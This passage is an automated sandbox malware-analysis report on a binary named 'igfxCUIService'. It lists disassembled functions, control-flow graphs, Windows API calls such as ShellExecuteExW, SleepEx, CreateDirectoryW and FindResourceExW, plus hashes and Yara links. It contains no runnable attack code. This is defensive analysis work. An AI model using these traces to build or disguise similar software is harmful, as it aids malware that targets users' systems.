                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                  • API String ID: 3578986977-3242537097
                                  • Opcode ID: 06d71198abbc97e26f76b062836246dbfca7114ae569147b3fdda397bc79c880
                                  • Instruction ID: 1f0d2d374b029f3307330a12cb67228f304c3185dea8e0d9e8c86386993293e4
                                  • Opcode Fuzzy Hash: 06d71198abbc97e26f76b062836246dbfca7114ae569147b3fdda397bc79c880
                                  • Instruction Fuzzy Hash: 85017571E557319FDB101B6DFD0DA663AA8AB417D2B080221FE06D23D4DB6CDC089672
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D4A8AF, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301UNIQUELIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 224 d4a8af-d4a8bf 225 d4a8c1-d4a8d4 call d41844 call d41857 224->225 226 d4a8d9-d4a8db 224->226 240 d4ac58 225->240 227 d4ac40-d4ac4d call d41844 call d41857 226->227 228 d4a8e1-d4a8e7 226->228 246 d4ac53 call d41341 227->246 228->227 231 d4a8ed-d4a913 228->231 231->227 235 d4a919-d4a922 231->235 238 d4a924-d4a937 call d41844 call d41857 235->238 239 d4a93c-d4a93e 235->239 238->246 243 d4a944-d4a947 239->243 244 d4ac3c-d4ac3e 239->244 245 d4ac5b-d4ac5e 240->245 243->244 248 d4a94d-d4a951 243->248 244->245 246->240 248->238 251 d4a953-d4a96a 248->251 253 d4a96c-d4a96f 251->253 254 d4a9bb-d4a9c1 251->254 255 d4a971-d4a97a 253->255 256 d4a97f-d4a985 253->256 257 d4a987-d4a99e call d41844 call d41857 call d41341 254->257 258 d4a9c3-d4a9cd 254->258 259 d4aa3f-d4aa4f 255->259 256->257 260 d4a9a3-d4a9b6 256->260 290 d4ab73 257->290 262 d4a9d4-d4a9f2 call d4690d call d468d3 * 2 258->262 263 d4a9cf-d4a9d1 258->263 265 d4ab14-d4ab1d call d51bca 259->265 266 d4aa55-d4aa61 259->266 260->259 294 d4a9f4-d4aa0a call d41857 call d41844 262->294 295 d4aa0f-d4aa38 call d4ae02 262->295 263->262 279 d4ab90 265->279 280 d4ab1f-d4ab31 265->280 266->265 270 d4aa67-d4aa69 266->270 270->265 275 d4aa6f-d4aa93 270->275 275->265 276 d4aa95-d4aaab 275->276 276->265 281 d4aaad-d4aaaf 276->281 283 d4ab94-d4abac ReadFile 279->283 280->279 285 d4ab33-d4ab42 GetConsoleMode 280->285 281->265 286 d4aab1-d4aad7 281->286 288 d4abae-d4abb4 283->288 289 d4ac08-d4ac13 GetLastError 283->289 285->279 291 d4ab44-d4ab48 285->291 286->265 293 d4aad9-d4aaef 286->293 288->289 298 d4abb6 288->298 296 d4ac15-d4ac27 call d41857 call d41844 289->296 297 d4ac2c-d4ac2f 289->297 292 d4ab76-d4ab80 call d468d3 290->292 291->283 299 d4ab4a-d4ab64 ReadConsoleW 291->299 292->245 293->265 301 d4aaf1-d4aaf3 293->301 294->290 295->259 296->290 308 d4ac35-d4ac37 297->308 309 d4ab6c-d4ab72 call d41821 297->309 305 d4abb9-d4abcb 298->305 306 d4ab85-d4ab8e 299->306 307 d4ab66 GetLastError 299->307 301->265 311 d4aaf5-d4ab0f 301->311 305->292 315 d4abcd-d4abd1 305->315 306->305 307->309 308->292 309->290 311->265 320 d4abd3-d4abe3 call d4a5c9 315->320 321 d4abea-d4abf5 315->321 332 d4abe6-d4abe8 320->332 322 d4abf7 call d4a720 321->322 323 d4ac01-d4ac06 call d4a3f8 321->323 330 d4abfc-d4abff 322->330 323->330 330->332 332->292
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 2ae1e096bc31375a509d90d4dc0f9dc4ec897901ac9084ff3c0bf4fc2abaf3e8
                                  • Instruction ID: ff07c534aabcc7913fc0c65387fc906e81296f056cfb7bd272cb52356e1a094d
                                  • Opcode Fuzzy Hash: 2ae1e096bc31375a509d90d4dc0f9dc4ec897901ac9084ff3c0bf4fc2abaf3e8
                                  • Instruction Fuzzy Hash: 2EC1DEB4A44349AFDF11DF9CD880BAEBBB2EF49300F084159E945AB392C7749941CB72
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D53F7A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 333 d53f7a-d53faa call d53d56 336 d53fc5-d53fd1 call d4c8f7 333->336 337 d53fac-d53fb7 call d41844 333->337 343 d53fd3-d53fe8 call d41844 call d41857 336->343 344 d53fea-d54033 call d53cc1 336->344 342 d53fb9-d53fc0 call d41857 337->342 354 d5429f-d542a3 342->354 343->342 352 d54035-d5403e 344->352 353 d540a0-d540a9 GetFileType 344->353 356 d54075-d5409b GetLastError call d41821 352->356 357 d54040-d54044 352->357 358 d540f2-d540f5 353->358 359 d540ab-d540dc GetLastError call d41821 CloseHandle 353->359 356->342 357->356 362 d54046-d54073 call d53cc1 357->362 360 d540f7-d540fc 358->360 361 d540fe-d54104 358->361 359->342 370 d540e2-d540ed call d41857 359->370 366 d54108-d54156 call d4c842 360->366 361->366 367 d54106 361->367 362->353 362->356 376 d54175-d5419d call d53a6e 366->376 377 d54158-d54164 call d53ed0 366->377 367->366 370->342 382 d541a2-d541e3 376->382 383 d5419f-d541a0 376->383 377->376 384 d54166 377->384 386 d541e5-d541e9 382->386 387 d54204-d54212 382->387 385 d54168-d54170 call d49118 383->385 384->385 385->354 386->387 389 d541eb-d541ff 386->389 390 d5429d 387->390 391 d54218-d5421c 387->391 389->387 390->354 391->390 393 d5421e-d54251 CloseHandle call d53cc1 391->393 396 d54285-d54299 393->396 397 d54253-d5427f GetLastError call d41821 call d4ca0a 393->397 396->390 397->396
                                  APIs
                                    • Part of subcall function 00D53CC1: CreateFileW.KERNELBASE(00000000,00000000,?,00D54023,?,?,00000000,?,00D54023,00000000,0000000C), ref: 00D53CDE
                                  • GetLastError.KERNEL32 ref: 00D5408E
                                  • __dosmaperr.LIBCMT ref: 00D54095
                                  • GetFileType.KERNELBASE(00000000), ref: 00D540A1
                                  • GetLastError.KERNEL32 ref: 00D540AB
                                  • __dosmaperr.LIBCMT ref: 00D540B4
                                  • CloseHandle.KERNEL32(00000000), ref: 00D540D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00D54221
                                  • GetLastError.KERNEL32 ref: 00D54253
                                  • __dosmaperr.LIBCMT ref: 00D5425A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: d40d349e02439af984f955b3b15221167080bc8bee22425d5a95ac620f74c646
                                  • Instruction ID: 86a3144ec5a9bcf2390b7f218c9514e87bac7d05ae80550936704a8739e89bfa
                                  • Opcode Fuzzy Hash: d40d349e02439af984f955b3b15221167080bc8bee22425d5a95ac620f74c646
                                  • Instruction Fuzzy Hash: CCA11532A142589FCF199F6CDC91BAE3BA1EB46325F280159EC11EB3D1CB358946C772
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  Function 00D19CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51synchronizationUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 961 d19ce0-d19d5e ShellExecuteExW WaitForSingleObject 962 d19d60-d19d63 961->962 963 d19d68-d19d77 961->963 962->963 964 d19d81-d19d84 963->964 965 d19d79-d19d7c 963->965 965->964
                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 00D19D3A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D19D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteObjectShellSingleWait
                                  • String ID: <$@
                                  • API String ID: 1289292659-1426351568
                                  • Opcode ID: 5432bd940a9541b20b370462781ba93ae44b57affc1b630c98c2caaa0701a4d2
                                  • Instruction ID: bd643f9732ae5c6f60a0cf0cccbd56833cd1e9a4bf8eb6a6c5cfb06d8b46d19d
                                  • Opcode Fuzzy Hash: 5432bd940a9541b20b370462781ba93ae44b57affc1b630c98c2caaa0701a4d2
                                  • Instruction Fuzzy Hash: A0113A71D01619ABDB00CFA8D858B8EFBB4FF49325F148359E824AA2A4DB758944CFD0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D21330, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 966 d21330-d21379 967 d21380-d21383 966->967 968 d21394-d213af call d3c92f * 2 SleepEx 967->968 969 d21385-d21388 967->969 974 d213b1-d213b5 968->974 969->968 970 d2138a-d2138d 969->970 970->968 972 d2138f-d21392 970->972 972->968 972->974 974->967 977 d213b7-d213dd call d3c92f SleepEx CreateDirectoryW call d20090 974->977 981 d213e2-d21403 call d344d0 977->981
                                  APIs
                                  • SleepEx.KERNELBASE(?,00000000,F0B87680,?,?), ref: 00D213AF
                                  • SleepEx.KERNELBASE(?,00000000,?,00000000,F0B87680,?,?), ref: 00D213CD
                                  • CreateDirectoryW.KERNELBASE(00000000,?,00000000,?,00000000,F0B87680,?,?), ref: 00D213D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$CreateDirectory
                                  • String ID: type
                                  • API String ID: 2746843503-2363381545
                                  • Opcode ID: 980fc5c70a6c224a3fb67e0015d13486c540574b18b14ffcb9111f554b7d26c1
                                  • Instruction ID: b3689a058807341fdccfa6f591d02b92ad8fa3fe3558e2055eb3f2ce9c06be25
                                  • Opcode Fuzzy Hash: 980fc5c70a6c224a3fb67e0015d13486c540574b18b14ffcb9111f554b7d26c1
                                  • Instruction Fuzzy Hash: FD01F7B5910338ABD710AB68DC06B5BBBBDFB45B11F014125F805E76D1CB7419008AB5
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D21268, Relevance: 4.6, APIs: 3, Instructions: 132COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 985 d21268-d2126e 986 d21270-d2127c 985->986 987 d2120b-d21223 985->987 990 d21201-d21208 call d34b47 986->990 991 d2127e-d2128c 986->991 988 d212a1-d212be call d344d0 987->988 989 d21225-d21231 987->989 994 d21233-d21241 989->994 995 d21297-d2129e call d34b47 989->995 990->987 996 d21292 991->996 997 d21323-d21379 call d41351 991->997 994->997 1001 d21247 994->1001 995->988 996->990 1006 d21380-d21383 997->1006 1001->995 1007 d21394-d213af call d3c92f * 2 SleepEx 1006->1007 1008 d21385-d21388 1006->1008 1013 d213b1-d213b5 1007->1013 1008->1007 1009 d2138a-d2138d 1008->1009 1009->1007 1011 d2138f-d21392 1009->1011 1011->1007 1011->1013 1013->1006 1016 d213b7-d21403 call d3c92f SleepEx CreateDirectoryW call d20090 call d344d0 1013->1016
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc34073e71088ae788ee5576795708e0ea2f480fa2e3794928b1f195a737bf36
                                  • Instruction ID: a107ff7dee9df8548a2407e1bec1fdfd34367503d5980ed599cc21cca849ead6
                                  • Opcode Fuzzy Hash: bc34073e71088ae788ee5576795708e0ea2f480fa2e3794928b1f195a737bf36
                                  • Instruction Fuzzy Hash: DB418035A001289BDB18DF1CEC467AEB766EBA5315F108139F805D77C1C7389D4087B1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00D49118, Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1024 d49118-d4912c call d4ca9b 1027 d49132-d4913a 1024->1027 1028 d4912e-d49130 1024->1028 1030 d49145-d49148 1027->1030 1031 d4913c-d49143 1027->1031 1029 d49180-d491a0 call d4ca0a 1028->1029 1040 d491a2-d491ac call d41821 1029->1040 1041 d491ae 1029->1041 1034 d49166-d49176 call d4ca9b FindCloseChangeNotification 1030->1034 1035 d4914a-d4914e 1030->1035 1031->1030 1033 d49150-d49164 call d4ca9b * 2 1031->1033 1033->1028 1033->1034 1034->1028 1043 d49178-d4917e GetLastError 1034->1043 1035->1033 1035->1034 1045 d491b0-d491b3 1040->1045 1041->1045 1043->1029
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000001,?,00D49046,00000001,00D6D010,0000000C,00D490F8,00000000), ref: 00D4916E
                                  • GetLastError.KERNEL32(?,00D49046,00000001,00D6D010,0000000C,00D490F8,00000000), ref: 00D49178
                                  • __dosmaperr.LIBCMT ref: 00D491A3
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                  • String ID:
                                  • API String ID: 490808831-0
                                  • Opcode ID: dea73b2ecc90caf73fe71f481f8adde3eb8260d49aa31561ec713a64f1419efe
                                  • Instruction ID: 3f874cb4ef8d62aa9f018117b7b2059e952f0f5652d59cbe53f2c6f9a6c7c32b
                                  • Opcode Fuzzy Hash: dea73b2ecc90caf73fe71f481f8adde3eb8260d49aa31561ec713a64f1419efe
                                  • Instruction Fuzzy Hash: 6A012B32A1532917D771A77AA89F77FA78A8B82730F2D0659F908D72C1DA618C418170
                                  Uniqueness

                                  Uniqueness Score: 2.48%

                                  Function 00D4BE03, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1049 d4be03-d4be11 GetEnvironmentStringsW 1050 d4be17-d4be26 call d4bd48 call d4690d 1049->1050 1051 d4be13-d4be15 1049->1051 1056 d4be2b-d4be31 1050->1056 1052 d4be4e-d4be52 1051->1052 1057 d4be33-d4be3b call d373d0 1056->1057 1058 d4be3e-d4be4d call d468d3 FreeEnvironmentStringsW 1056->1058 1057->1058 1058->1052
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,00D43021), ref: 00D4BE07
                                  • _free.LIBCMT ref: 00D4BE40
                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00D43021), ref: 00D4BE47
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnvironmentStrings$Free_free
                                  • String ID:
                                  • API String ID: 2716640707-0
                                  • Opcode ID: a342dbd1d9b8aec40875c3e4b9f162bcef7bf1fd771cfca8917cf2d1e72af4d1
                                  • Instruction ID: 04e7100551ad2dfb564784cfd2dee6fec1ea164f5ac08c7e0c4e6f81573d0503
                                  • Opcode Fuzzy Hash: a342dbd1d9b8aec40875c3e4b9f162bcef7bf1fd771cfca8917cf2d1e72af4d1
                                  • Instruction Fuzzy Hash: 8BE09B77505B25279212223D7D4A9AF1A0ACFD2671B290336F525962C5EF65CC0641B2
                                  Uniqueness

                                  Uniqueness Score: 0.73%

                                  Function 00D25750, Relevance: 2.6, APIs: 2, Instructions: 68COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1063 d25750-d2575d 1064 d257be-d257cb call d273e0 1063->1064 1065 d2575f-d25775 MultiByteToWideChar 1063->1065 1065->1064 1066 d25777-d25788 1065->1066 1068 d25794-d257a8 MultiByteToWideChar 1066->1068 1069 d2578a-d25792 call d28590 1066->1069 1072 d257aa-d257bb 1068->1072 1073 d257ce-d257d8 call d13ea0 1068->1073 1069->1068
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,00D19B59,?,?), ref: 00D2576A
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,00000000,?,00D19B59,?,?), ref: 00D2579D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  • Opcode ID: 2899bf83815a3a1050b4207c5b9c0b4f86136d3871d9f8c3b15d13aebf49cb0a
                                  • Instruction ID: 80790215f181bc7d2faea90604a15bbb227200e74667bb99e15476fd1a8a61cf
                                  • Opcode Fuzzy Hash: 2899bf83815a3a1050b4207c5b9c0b4f86136d3871d9f8c3b15d13aebf49cb0a
                                  • Instruction Fuzzy Hash: 5111E532345225AFD6209B4CEC89F6EF759EF90764F200219FA14DB3C4CA30AC0187B0
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  Function 00D1A890, Relevance: 1.9, APIs: 1, Instructions: 403COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1077 d1a890-d1a8ee call d140f0 1080 d1a8f4-d1a912 call d27040 1077->1080 1081 d1ad4a-d1ad4f call d13ea0 1077->1081 1089 d1a921-d1a944 call d230a0 1080->1089 1090 d1a914-d1a91c call d25750 1080->1090 1084 d1ad54-d1ad59 call d13ea0 1081->1084 1088 d1ad5e-d1ad63 call d13ea0 1084->1088 1093 d1ad68-d1ad6d call d13ea0 1088->1093 1098 d1abf7-d1ac99 call d25020 call d28500 call d23d50 call d359c3 1089->1098 1099 d1a94a 1089->1099 1090->1089 1097 d1ad72-d1ad77 call d13ea0 1093->1097 1103 d1ad7c-d1ad81 call d41351 1097->1103 1125 d1aca3-d1acad 1098->1125 1126 d1ac9b-d1ac9e 1098->1126 1102 d1a950-d1a96a call d2a510 1099->1102 1111 d1a970-d1a984 call d140f0 1102->1111 1112 d1abba-d1abc0 call d26890 1102->1112 1111->1084 1122 d1a98a-d1a9a4 call d27040 1111->1122 1116 d1abc5-d1abc7 1112->1116 1119 d1abf4 1116->1119 1120 d1abc9-d1abef call d12bd0 1116->1120 1119->1098 1120->1119 1136 d1a9a6-d1a9aa call d25750 1122->1136 1137 d1a9af-d1a9bb 1122->1137 1128 d1acdb-d1ad02 1125->1128 1129 d1acaf-d1acbb 1125->1129 1126->1125 1134 d1ad04-d1ad07 1128->1134 1135 d1ad0c-d1ad49 call d344d0 1128->1135 1131 d1acd1-d1acd8 call d34b47 1129->1131 1132 d1acbd-d1accb 1129->1132 1131->1128 1132->1103 1132->1131 1134->1135 1136->1137 1142 d1a9c8-d1a9d8 call d140f0 1137->1142 1143 d1a9bd-d1a9c6 1137->1143 1142->1088 1149 d1a9de-d1a9f4 1142->1149 1143->1142 1143->1149 1152 d1a9f6-d1a9f8 1149->1152 1153 d1a9fa-d1a9ff 1149->1153 1154 d1aa0f-d1aa34 call d272c0 1152->1154 1155 d1aa00-d1aa09 1153->1155 1159 d1aa41-d1aa51 call d140f0 1154->1159 1160 d1aa36-d1aa3f 1154->1160 1155->1155 1156 d1aa0b-d1aa0d 1155->1156 1156->1154 1159->1093 1164 d1aa57-d1aa73 1159->1164 1160->1159 1160->1164 1164->1097 1167 d1aa79-d1aa88 1164->1167 1168 d1aa96-d1aa9e 1167->1168 1169 d1aa8a-d1aa93 call d28590 1167->1169 1171 d1aaa0-d1aaa2 1168->1171 1172 d1aac4-d1aac6 1168->1172 1169->1168 1176 d1aaa4-d1aab4 call d41857 call d41341 1171->1176 1177 d1aab6-d1aabe call d373d0 1171->1177 1173 d1aac8-d1aad8 call d41857 call d41341 1172->1173 1174 d1aada-d1aadf 1172->1174 1179 d1aae2-d1aae9 1173->1179 1174->1179 1186 d1aac1 1176->1186 1177->1186 1179->1097 1183 d1aaef-d1ab06 1179->1183 1188 d1ab51-d1ab68 1183->1188 1189 d1ab08-d1ab12 1183->1189 1186->1172 1191 d1ab72-d1ab89 1188->1191 1192 d1ab6a-d1ab6d 1188->1192 1194 d1ab45-d1ab4c call d285f0 1189->1194 1195 d1ab14-d1ab18 1189->1195 1198 d1ab93-d1aba7 1191->1198 1199 d1ab8b-d1ab8e 1191->1199 1192->1191 1194->1188 1195->1194 1200 d1ab1a-d1ab30 call d28500 1195->1200 1198->1102 1201 d1abad-d1abb5 1198->1201 1199->1198 1205 d1ab32-d1ab38 1200->1205 1206 d1ab3d-d1ab43 1200->1206 1201->1102 1205->1206 1206->1188
                                  APIs
                                    • Part of subcall function 00D27040: FindResourceExW.KERNEL32(00000000,00000006,00000001,00000000,00000000,?,?,00000000,?,?,00D19B48,?,?,?,?,/api/req/res), ref: 00D27086
                                    • Part of subcall function 00D25750: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,00D19B59,?,?), ref: 00D2576A
                                    • Part of subcall function 00D25750: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,00000000,?,00D19B59,?,?), ref: 00D2579D
                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00D1AC7D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$FindIos_base_dtorResourcestd::ios_base::_
                                  • String ID:
                                  • API String ID: 1422373393-0
                                  • Opcode ID: 964e7c0dfbaf49b402d1b882da9fc4840c6a6a4d3cd80c8aac32a198fa17010b
                                  • Instruction ID: bff8f4780150d228150d62e6b532c07b57afea51794014cabb5835f0d3f2dd55
                                  • Opcode Fuzzy Hash: 964e7c0dfbaf49b402d1b882da9fc4840c6a6a4d3cd80c8aac32a198fa17010b
                                  • Instruction Fuzzy Hash: 2DF1B070A01249DFDB14DF6CE884BADBBB1FF45314F1481A9E815AB291EB309D85CFA1
                                  Uniqueness

                                  Uniqueness Score: 1.47%

                                  Function 00D28810, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1207 d28810-d288f3 call d12bd0 call d348c6 call d35776 call d29cb0 1219 d288f5-d288f9 1207->1219 1220 d288fd-d28904 1207->1220 1219->1220 1221 d28916-d28927 1220->1221 1222 d28906-d28911 call d12bd0 1220->1222 1222->1221
                                  APIs
                                    • Part of subcall function 00D12BD0: ___std_exception_copy.LIBVCRUNTIME ref: 00D12C5F
                                  • std::locale::_Init.LIBCPMT ref: 00D2889B
                                    • Part of subcall function 00D35776: __EH_prolog3.LIBCMT ref: 00D3577D
                                    • Part of subcall function 00D35776: std::_Lockit::_Lockit.LIBCPMT ref: 00D35788
                                    • Part of subcall function 00D35776: std::locale::_Setgloballocale.LIBCPMT ref: 00D357A3
                                    • Part of subcall function 00D35776: _Yarn.LIBCPMT ref: 00D357B9
                                    • Part of subcall function 00D35776: std::_Lockit::~_Lockit.LIBCPMT ref: 00D357F9
                                    • Part of subcall function 00D29CB0: std::_Lockit::_Lockit.LIBCPMT ref: 00D29CF0
                                    • Part of subcall function 00D29CB0: std::_Lockit::_Lockit.LIBCPMT ref: 00D29D12
                                    • Part of subcall function 00D29CB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D29D32
                                    • Part of subcall function 00D29CB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D29E02
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
